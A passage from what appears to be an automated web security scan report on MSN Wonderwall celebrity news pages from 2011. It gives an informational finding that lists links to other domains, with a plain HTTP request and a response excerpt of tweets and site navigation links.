http://static.wonderwall.com/cache/css/1296066112/Z2FsbGVyeS5jc3M7Z2FsbGVyeS1zaXRlLmNzcztzdG9yeS5jc3M7c3Rvcnktc2l0ZS5jc3M7dG9wU3Rvcmllcy5jc3M7dG9wU3Rvcmllcy1zaXRlLmNzcztjYXRlZ29yeS5jc3M7Y2F0ZWdvcnktc2l0ZS5jc3M7dmlkZW8uY3NzO3ZpZGVvLXNpdGUuY3NzO3ZpZGVvQ2hhbm5lbHMuY3NzO2NlbGVicml0aWVzLmNzcztjZWxlYnJpdGllcy1zaXRlLmNzcztjZWxlYnJpdHkuY3NzO2NlbGVicml0eS1zaXRlLmNzcztodWIuY3NzO2h1Yi1zaXRlLmNzcztzaXRlU2VhcmNoLmNzcztzaXRlU2VhcmNoLXNpdGUuY3NzO2dlbmVyaWMuY3NzO2dlbmVyaWMtc2l0ZS5jc3M7Z2FtZS5jc3M7Z2FtZS1zaXRlLmNzcztzcGVjaWFsLmNzcztzcGVjaWFsLXNpdGUuY3Nz.css
http://static.wonderwall.com/cache/css/1296617453/Zm9udHMuY3NzO2ZvbnRzLXNpdGUuY3NzO3NpdGUuY3NzO2hlYWRlci5jc3M7bXNuSGVhZGVyLmNzcztiaW5nU2VhcmNoLmNzcztidXp6U3RyZWFtLmNzcztidXp6U3RyZWFtLXNpdGUuY3NzO3dhbGwuY3NzO3BjLmNzcztwYy1zaXRlLmNzcztuZXdzU3RyaXAuY3NzO2Zvb3Rlci5jc3M7cGFnaW5hdGlvbi5jc3M7dml0YWxpdHkuY3NzO2VtYmVkZGVkU2VhcmNoLmNzczt2b3RlLmNzcztyYXRpbmcuY3NzO21vcmVUaXRsZXMuY3NzO2V2ZXJ5dGhpbmcuY3NzO2NvbW1lbnRzLmNzcztjb21tZW50cy1zaXRlLmNzcztjcm9zc1Byb21vLmNzcztzaGFyZS5jc3M7c2hhcmUtc2l0ZS5jc3M7ZnJhbmNoaXNlTGlzdC5jc3M7ZmJTdHJpcGUuY3Nz.css
http://static.wonderwall.com/photos/Module1x1/15856_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/1774_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg
http://static.wonderwall.com/photos/Module1x1/21214_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/23347_Module1x1_634268888500102520.jpg
http://static.wonderwall.com/photos/Module1x1/23936_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/25464_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/32111_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/32972_Module1x1_634164434770437095.jpg
http://static.wonderwall.com/photos/Module1x1/3828_Module1x1_634057198790798033.jpg
http://static.wonderwall.com/photos/Module1x1/44153_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/7477_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/9389_Module1x1.jpg
http://thenakedmom.com/
http://tmi.me/6g1HB
http://twitter.com/BravoAndy
http://twitter.com/CountessLuAnn
http://twitter.com/CountessLuAnn/statuses/32790989567426560
http://twitter.com/Diamonds214
http://twitter.com/Jillzarin
http://twitter.com/Jillzarin/statuses/32798137911345152
http://twitter.com/KimKardashian
http://twitter.com/KimKardashian/statuses/32797990213124097
http://twitter.com/Kimzolciak
http://twitter.com/Kimzolciak/statuses/32776407499149312
http://twitter.com/Kimzolciak/statuses/32789035353112576
http://twitter.com/Kimzolciak/statuses/32789163472330752
http://twitter.com/Kimzolciak/statuses/32789790063591424
http://twitter.com/Kimzolciak/statuses/32796834711732224
http://twitter.com/Kimzolciak/statuses/32797271749820416
http://twitter.com/Kimzolciak/statuses/32797550088028160
http://twitter.com/Kimzolciak/statuses/32797701804400640
http://twitter.com/PerezHilton
http://twitter.com/PerezHilton/statuses/32802397742960640
http://twitter.com/Pilltastic
http://twitter.com/RHWONY
http://twitter.com/RNB_007
http://twitter.com/SimonvanKempen
http://twitter.com/SkaredOfMee
http://twitter.com/SonjatMorgan
http://twitter.com/WonderwallMSN
http://twitter.com/WonderwallMSN/statuses/32772731053277184
http://twitter.com/_michaelGAGA
http://twitter.com/bretmichaels
http://twitter.com/bretmichaels/statuses/32796448315678721
http://twitter.com/bretmichaels/statuses/32810341914116096
http://twitter.com/brookeburke
http://twitter.com/brookeburke/statuses/32778524804775936
http://twitter.com/brookeburke/statuses/32779078033473536
http://twitter.com/brookeburke/statuses/32780150873522177
http://twitter.com/brookeburke/statuses/32781494627864576
http://twitter.com/brookeburke/statuses/32781771502260225
http://twitter.com/channingtatum
http://twitter.com/channingtatum/statuses/32802789788745728
http://twitter.com/foodjunkie101
http://twitter.com/iamdiddy
http://twitter.com/iamdiddy/statuses/32808608114671616
http://twitter.com/iamdiddy/statuses/32810279058276352
http://twitter.com/mccordalex
http://twitter.com/mccordalex/statuses/32814304038232064
http://twitter.com/meka2blessed4u
http://twitter.com/ramonasinger
http://twitter.com/ramonasinger/statuses/32800833896714241
http://twitter.com/share?original_referer=http%3A%2F%2Fwonderwall.msn.com%2Fmovies%2Fgwyneth-paltrow-wanted-to-scrap-goop-to-halt-criticism-1594220.story%3Focid%3Dtwtr-utweet
http://twitter.com/supercrosslive
http://twitter.com/sweetieHughes
http://twitter.com/yerdua4
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/news/search?q=James+Franco+class+columbia+college+hollywood&form=MSNXNM&ocid=xnetr1-5
http://www.bing.com/search?FORM=CWWWBQ
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.mixx.com/submit?page_url=http%3A%2F%2Fwonderwall.msn.com%2Fmovies%2Fgwyneth-paltrow-wanted-to-scrap-goop-to-halt-criticism-1594220.story
http://www.myspace.com/Modules/PostTo/Pages/?l=3t=Gwyneth+Paltrow+wanted+to+scrap+GOOP+to+halt+criticism&u=http%3A%2F%2Fwonderwall.msn.com%2Fmovies%2Fgwyneth-paltrow-wanted-to-scrap-goop-to-halt-criticism-1594220.story
http://www.supercrossonline.com/bretmichaels/
http://www.theworkbuzz.com/career-advice/women-cautious-about-social-media-and-work/?cobrand=msn&utm_source=MSN&utm_medium=MSNHP&utm_campaign=MSNCareers&ocid=xnetr1-2
http://www.wenn.com/
http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js
https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fwonderwall.msn.com%2Fmovies%2Fgwyneth-paltrow-wanted-to-scrap-goop-to-halt-criticism-1594220.story
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /movies/gwyneth-paltrow-wanted-to-scrap-goop-to-halt-criticism-1594220.story?gt1=28135 HTTP/1.1
Host: wonderwall.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 15:42:45 GMT
Expires:
Pragma:
Cache-Control: public
Cache-Control: max-age=300
Vary: Accept-Encoding
Content-Type: text/html
X-Cache-Lookup: HIT from localhost:8080
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
 <a href="http://huff.to/dOv31R">http://huff.to/dOv31R</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/iamdiddy/statuses/32808608114671616">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/23347_Module1x1_634268888500102520.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/channingtatum">channingtatum</a>: VIDEOS OF THE WEEK: Check out Chan in 2 new film clips and a behind-the-scenes featurette from ...The Eagle...... <a href="http://ow.ly/3OOBd">http://ow.ly/3OOBd</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/channingtatum/statuses/32802789788745728">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/9389_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/PerezHilton">PerezHilton</a>: Surprise!!! I've been keeping another secret! <a href="http://bit.ly/gO5b3F">http://bit.ly/gO5b3F</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/PerezHilton/statuses/32802397742960640">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/32111_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/ramonasinger">ramonasinger</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/ramonasinger/statuses/32800833896714241">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/23936_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Jillzarin">Jillzarin</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Jillzarin/statuses/32798137911345152">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/32972_Module1x1_634164434770437095.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/KimKardashian">KimKardashian</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/KimKardashian/statuses/32797990213124097">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: 32 thank u! RT <a href="http://twitter.com/SkaredOfMee">@SkaredOfMee</a>: RT <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/32797701804400640">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: <a href="http://twitter.com/meka2blessed4u">@meka2blessed4u</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/32797550088028160">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: :) RT <a href="http://twitter.com/Diamonds214">@Diamonds214</a>: <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a> Ugh! Try to nap when the baby does n play Mozart n put the headphones on ur belly. ... <a href="http://tmi.me/6g1HB">http://tmi.me/6g1HB</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/32797271749820416">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: Hell to the No!! He is not quiet! RT <a href="http://twitter.com/RHWONY">@RHWONY</a>: <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/32796834711732224">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/25464_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/bretmichaels">bretmichaels</a>: Vote for The Bret Michaels' Rock Hard-Ride Hard Award!
<a href="http://www.supercrossonline.com/bretmichaels/">http://www.supercrossonline.com/bretmichaels/</a> <a href="http://twitter.com/supercrosslive">@supercrosslive</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/bretmichaels/statuses/32796448315678721">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/21214_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/CountessLuAnn">CountessLuAnn</a>: With Mariska Hargitay before she left the set for the SAG Awards. We could be sisters! Shooting on location for... <a href="http://fb.me/zQHk5Tm1">http://fb.me/zQHk5Tm1</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/CountessLuAnn/statuses/32790989567426560">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/32789790063591424">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: <a href="http://twitter.com/foodjunkie101">@foodjunkie101</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/32789163472330752">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: Aww and I love Tampa! RT <a href="http://twitter.com/RNB_007">@RNB_007</a>: <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/32789035353112576">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/3828_Module1x1_634057198790798033.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/brookeburke">brookeburke</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/brookeburke/statuses/32781771502260225">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/3828_Module1x1_634057198790798033.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/brookeburke">brookeburke</a>: <a href="http://twitter.com/yerdua4">@yerdua4</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/brookeburke/statuses/32781494627864576">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/3828_Module1x1_634057198790798033.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/brookeburke">brookeburke</a>: Thx 4 all the support, I hope to extend my tour and visit your city. Chicago is looking bad... get an autograohed copy <a href="http://bit.ly/fzn41j">http://bit.ly/fzn41j</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/brookeburke/statuses/32780150873522177">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/3828_Module1x1_634057198790798033.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/brookeburke">brookeburke</a>: I'll be on Wendy Williams latr today talking The Naked Mom and romance. have you seen my book yet <a href="Http://thenakedmom.com">Http://thenakedmom.com</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/brookeburke/statuses/32779078033473536">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/3828_Module1x1_634057198790798033.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/brookeburke">brookeburke</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/brookeburke/statuses/32778524804775936">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: <a href="http://twitter.com/sweetieHughes">@sweetieHughes</a> loved when I did that ;) RT <a href="http://twitter.com/_michaelGAGA">@_michaelGAGA</a>: Lmfaoooo <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/32776407499149312">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/1774_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/WonderwallMSN">WonderwallMSN</a>: Snooki finds her long lost rodent love: will there be 6 more weeks of winter in The Jerz or is spring on its way? <a href="http://on-msn.com/dG3a7i">http://on-msn.com/dG3a7i</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/WonderwallMSN/statuses/32772731053277184">Twitter</a>
...[SNIP]...
<li><a href="http://www.theworkbuzz.com/career-advice/women-cautious-about-social-media-and-work/?cobrand=msn&utm_source=MSN&utm_medium=MSNHP&utm_campaign=MSNCareers&ocid=xnetr1-2">Women cautious about social media and ...</a>
...[SNIP]...
<li><a href="http://www.bing.com/news/search?q=James+Franco+class+columbia+college+hollywood&form=MSNXNM&ocid=xnetr1-5">Bing: James Franco to teach class about ...</a>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" >BLTWY</a>
...[SNIP]...
<li class="hasMenu" id="hasMenu2"><a href="http://msn.foxsports.com/" class="hasMenuLink">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" >MLB</a></li><li><a href="http://msn.foxsports.com/nascar " >NASCAR</a></li><li><a href="http://msn.foxsports.com/nba" >NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball" >NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb" >NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl" >NFL</a></li><li><a href="http://msn.foxsports.com/nhl" >NHL</a></li><li><a href="http://msn.foxsports.com/fantasy" >Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer" >Soccer</a></li><li class="last"><a href="http://msn.foxsports.com/video?from=en-us_msnhp" >Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" >Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/" > Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " > Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" >Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" >Video</a>
...[SNIP]...
<li class="last"><a href="http://insidemsn.wordpress.com" >Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/" >White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/" >Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2" >Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " >Travel</a>
...[SNIP]...
<li class="bingLink last"><a href="http://www.bing.com/search?FORM=CWWWBQ" >Bing</a>
...[SNIP]...
<li><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_blank" class="pass">MSN Privacy</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/Entertainment.aspx" onclick="window.open(this.href,'help','width=960,height=720,resizeable=yes,status=no,titlebar=no,toolbar=no'); return false;" class="ignore" target="blank">Help</a>
...[SNIP]...
</p><a href="http://microsoft.com" >Microsoft</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

17.214. http://wonderwall.msn.com/movies/halle-berry-set-to-battle-model-ex-over-custody-1594335.story previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wonderwall.msn.com
Path:	/movies/halle-berry-set-to-battle-model-ex-over-custody-1594335.story

Issue detail

The page was loaded from a URL containing a query string:

http://wonderwall.msn.com/movies/halle-berry-set-to-battle-model-ex-over-custody-1594335.story?gt1=28135

The response contains the following links to other domains:

http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js
http://bit.ly/fzn41j
http://bit.ly/gO5b3F
http://celebrity-gossip.net/halle-berry/photo/halle-berry-olivier-martinez-75
http://del.icio.us/post?title=Halle+Berry+Set+to+Battle+Model+Ex+Over+Custody+of+Daughter&url=http%3A%2F%2Fwonderwall.msn.com%2Fmovies%2Fhalle-berry-set-to-battle-model-ex-over-custody-1594335.story
http://digg.com/submit?phase=2title=Halle+Berry+Set+to+Battle+Model+Ex+Over+Custody+of+Daughter&url=http%3A%2F%2Fwonderwall.msn.com%2Fmovies%2Fhalle-berry-set-to-battle-model-ex-over-custody-1594335.story
http://download.live.com/?sku=messenger
http://fb.me/Od4vcPhS
http://fb.me/zQHk5Tm1
http://go.microsoft.com/fwlink/?LinkId=74170
http://huff.to/dOv31R
http://insidemsn.wordpress.com/
http://microsoft.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://on-msn.com/dG3a7i
http://onlinehelp.microsoft.com/en-us/msn/Entertainment.aspx
http://ow.ly/3OOBd
http://platform.twitter.com/widgets.js
http://reddit.com/submit?title=Halle+Berry+Set+to+Battle+Model+Ex+Over+Custody+of+Daughter&url=http%3A%2F%2Fwonderwall.msn.com%2Fmovies%2Fhalle-berry-set-to-battle-model-ex-over-custody-1594335.story
http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css
http://static.wonderwall.com/cache/css/1296066112/Z2FsbGVyeS5jc3M7Z2FsbGVyeS1zaXRlLmNzcztzdG9yeS5jc3M7c3Rvcnktc2l0ZS5jc3M7dG9wU3Rvcmllcy5jc3M7dG9wU3Rvcmllcy1zaXRlLmNzcztjYXRlZ29yeS5jc3M7Y2F0ZWdvcnktc2l0ZS5jc3M7dmlkZW8uY3NzO3ZpZGVvLXNpdGUuY3NzO3ZpZGVvQ2hhbm5lbHMuY3NzO2NlbGVicml0aWVzLmNzcztjZWxlYnJpdGllcy1zaXRlLmNzcztjZWxlYnJpdHkuY3NzO2NlbGVicml0eS1zaXRlLmNzcztodWIuY3NzO2h1Yi1zaXRlLmNzcztzaXRlU2VhcmNoLmNzcztzaXRlU2VhcmNoLXNpdGUuY3NzO2dlbmVyaWMuY3NzO2dlbmVyaWMtc2l0ZS5jc3M7Z2FtZS5jc3M7Z2FtZS1zaXRlLmNzcztzcGVjaWFsLmNzcztzcGVjaWFsLXNpdGUuY3Nz.css
http://static.wonderwall.com/cache/css/1296617453/Zm9udHMuY3NzO2ZvbnRzLXNpdGUuY3NzO3NpdGUuY3NzO2hlYWRlci5jc3M7bXNuSGVhZGVyLmNzcztiaW5nU2VhcmNoLmNzcztidXp6U3RyZWFtLmNzcztidXp6U3RyZWFtLXNpdGUuY3NzO3dhbGwuY3NzO3BjLmNzcztwYy1zaXRlLmNzcztuZXdzU3RyaXAuY3NzO2Zvb3Rlci5jc3M7cGFnaW5hdGlvbi5jc3M7dml0YWxpdHkuY3NzO2VtYmVkZGVkU2VhcmNoLmNzczt2b3RlLmNzcztyYXRpbmcuY3NzO21vcmVUaXRsZXMuY3NzO2V2ZXJ5dGhpbmcuY3NzO2NvbW1lbnRzLmNzcztjb21tZW50cy1zaXRlLmNzcztjcm9zc1Byb21vLmNzcztzaGFyZS5jc3M7c2hhcmUtc2l0ZS5jc3M7ZnJhbmNoaXNlTGlzdC5jc3M7ZmJTdHJpcGUuY3Nz.css
http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif
http://static.wonderwall.com/photos/Module1x1/15856_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/1774_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg
http://static.wonderwall.com/photos/Module1x1/21214_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/23347_Module1x1_634268888500102520.jpg
http://static.wonderwall.com/photos/Module1x1/23936_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/25464_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/32111_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/32972_Module1x1_634164434770437095.jpg
http://static.wonderwall.com/photos/Module1x1/3828_Module1x1_634057198790798033.jpg
http://static.wonderwall.com/photos/Module1x1/45515_Module1x1_634320878981105144.jpg
http://static.wonderwall.com/photos/Module1x1/7477_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/9389_Module1x1.jpg
http://static.wonderwall.com/photos/Original/45515_Original.jpg
http://thenakedmom.com/
http://tmi.me/6g1HB
http://twitter.com/BravoAndy
http://twitter.com/CountessLuAnn
http://twitter.com/CountessLuAnn/statuses/32790989567426560
http://twitter.com/Diamonds214
http://twitter.com/Jillzarin
http://twitter.com/Jillzarin/statuses/32798137911345152
http://twitter.com/KimKardashian
http://twitter.com/KimKardashian/statuses/32797990213124097
http://twitter.com/Kimzolciak
http://twitter.com/Kimzolciak/statuses/32776407499149312
http://twitter.com/Kimzolciak/statuses/32789035353112576
http://twitter.com/Kimzolciak/statuses/32789163472330752
http://twitter.com/Kimzolciak/statuses/32789790063591424
http://twitter.com/Kimzolciak/statuses/32796834711732224
http://twitter.com/Kimzolciak/statuses/32797271749820416
http://twitter.com/Kimzolciak/statuses/32797550088028160
http://twitter.com/Kimzolciak/statuses/32797701804400640
http://twitter.com/PerezHilton
http://twitter.com/PerezHilton/statuses/32802397742960640
http://twitter.com/Pilltastic
http://twitter.com/RHWONY
http://twitter.com/RNB_007
http://twitter.com/SimonvanKempen
http://twitter.com/SkaredOfMee
http://twitter.com/SonjatMorgan
http://twitter.com/WonderwallMSN
http://twitter.com/WonderwallMSN/statuses/32772731053277184
http://twitter.com/_michaelGAGA
http://twitter.com/bretmichaels
http://twitter.com/bretmichaels/statuses/32796448315678721
http://twitter.com/bretmichaels/statuses/32810341914116096
http://twitter.com/brookeburke
http://twitter.com/brookeburke/statuses/32778524804775936
http://twitter.com/brookeburke/statuses/32779078033473536
http://twitter.com/brookeburke/statuses/32780150873522177
http://twitter.com/brookeburke/statuses/32781494627864576
http://twitter.com/brookeburke/statuses/32781771502260225
http://twitter.com/channingtatum
http://twitter.com/channingtatum/statuses/32802789788745728
http://twitter.com/foodjunkie101
http://twitter.com/iamdiddy
http://twitter.com/iamdiddy/statuses/32808608114671616
http://twitter.com/iamdiddy/statuses/32810279058276352
http://twitter.com/mccordalex
http://twitter.com/mccordalex/statuses/32814304038232064
http://twitter.com/meka2blessed4u
http://twitter.com/ramonasinger
http://twitter.com/ramonasinger/statuses/32800833896714241
http://twitter.com/share?original_referer=http%3A%2F%2Fwonderwall.msn.com%2Fmovies%2Fhalle-berry-set-to-battle-model-ex-over-custody-1594335.story%3Focid%3Dtwtr-utweet
http://twitter.com/supercrosslive
http://twitter.com/sweetieHughes
http://twitter.com/yerdua4
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/news/search?q=James+Franco+class+columbia+college+hollywood&form=MSNXNM&ocid=xnetr1-5
http://www.bing.com/search?FORM=CWWWBQ
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bing.com/videos/watch/video/halle-berry-fights-for-custody/17w8q6el0?q=halle+berry&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008?from=WW
http://www.bltwy.com/
http://www.delish.com/
http://www.mixx.com/submit?page_url=http%3A%2F%2Fwonderwall.msn.com%2Fmovies%2Fhalle-berry-set-to-battle-model-ex-over-custody-1594335.story
http://www.myspace.com/Modules/PostTo/Pages/?l=3t=Halle+Berry+Set+to+Battle+Model+Ex+Over+Custody+of+Daughter&u=http%3A%2F%2Fwonderwall.msn.com%2Fmovies%2Fhalle-berry-set-to-battle-model-ex-over-custody-1594335.story
http://www.people.com/people/article/0,,20462565,00.html
http://www.radaronline.com/exclusives/2011/01/exclusive-halle-berrys-screaming-fits-ex-gabriel-Aubry-he-believes-shes-hired-pi
http://www.supercrossonline.com/bretmichaels/
http://www.theworkbuzz.com/career-advice/women-cautious-about-social-media-and-work/?cobrand=msn&utm_source=MSN&utm_medium=MSNHP&utm_campaign=MSNCareers&ocid=xnetr1-2
http://www.tmz.com/2011/01/31/halle-berry-custody-fight-daughter-gabriel-aubry-nahla-child-film-production-pull-out/
http://www.usmagazine.com/momsbabies/news/halle-berry-fighting-ex-gabriel-aubry-for-custody-2011311
http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js
